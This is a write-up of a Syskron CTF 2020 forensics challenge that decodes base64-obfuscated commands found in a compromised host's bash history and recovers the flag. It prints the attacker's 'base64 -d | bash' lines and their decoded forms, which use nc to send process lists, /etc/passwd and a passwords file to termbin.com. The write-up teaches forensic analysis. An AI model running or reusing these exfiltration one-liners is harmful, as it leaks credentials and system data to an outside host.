## Bash History

* **CTF:** Syskron CTF 2020
* **Category:** forensics
* **Points:** 200 
* **Author(s):** b0uldrr

---

### Challenge
```
We suspect that one of BB's internal hosts has been compromised. I copied its ~./bash_history file. Maybe, there are some suspicious commands?
```

### Download
* [bash_history](bash_history)

---

### Solution
Opening the bash history file, we see some `echo` commands scattered throughout which are decoding base64 text straight to bash.

```
$ cat bash_history | grep base64 
echo cHMgYXggPiBwcm9jZXNzZXM= | base64 -d | bash                                                                   
echo Y2F0IHByb2Nlc3NlcyB8IG5jIHRlcm1iaW4uY29tIDk5OTk= | base64 -d | bash                                           
echo cm0gcHJvY2Vzc2Vz | base64 -d | bash                                                                           
echo bHMgLWwgfCBuYyB0ZXJtYmluLmNvbSA5OTk5 | base64 -d | bash                                                       
echo Y2F0IC9ldGMvcGFzc3dkIHwgbmMgdGVybWJpbi5jb20gOTk5OQ== | base64 -d | bash                                       
echo Y2F0IHBhc3N3b3Jkcy50eHQgfCBuYyB0ZXJtYmluLmNvbSA5OTk5 | base64 -d | bash
```

These are our malicious commands... They will run the following commands on the host computer:
```
brno001
ps ax > processes
cat processes | nc termbin.com 9999
rm processesls -l | nc termbin.com 9999
cat /etc/passwd | nc termbin.com 9999
cat passwords.txt | nc termbin.com 9999
```

There were 2 other base64 encoded commands in the file which weren't decoded and piped to bash: 
```
echo xYTjBNR3hsTFdGc2JDMUVZWFJoSVNGOQ==                                                                            
echo ZWNobyBjM2x6YTNKdmJrTlVSbnQwU0dWNU                                                                            
```

Neither are correct base64 encodings on their own, but if we put them together:
```
ZWNobyBjM2x6YTNKdmJrTlVSbnQwU0dWNUxYTjBNR3hsTFdGc2JDMUVZWFJoSVNGOQ==
```

They do decode to:
```
echo c3lza3JvbkNURnt0SGV5LXN0MGxlLWFsbC1EYXRhISF9
```

Which itself decodes to:
```
syskronCTF{tHey-st0le-all-Data!!}
```

Long story short:
```
echo ZWNobyBjM2x6YTNKdmJrTlVSbnQwU0dWNUxYTjBNR3hsTFdGc2JDMUVZWFJoSVNGOQ== | base64 -d | bash | base64 -d
syskronCTF{tHey-st0le-all-Data!!}
```
---

### Flag 
```
syskronCTF{tHey-st0le-all-Data!!}
```
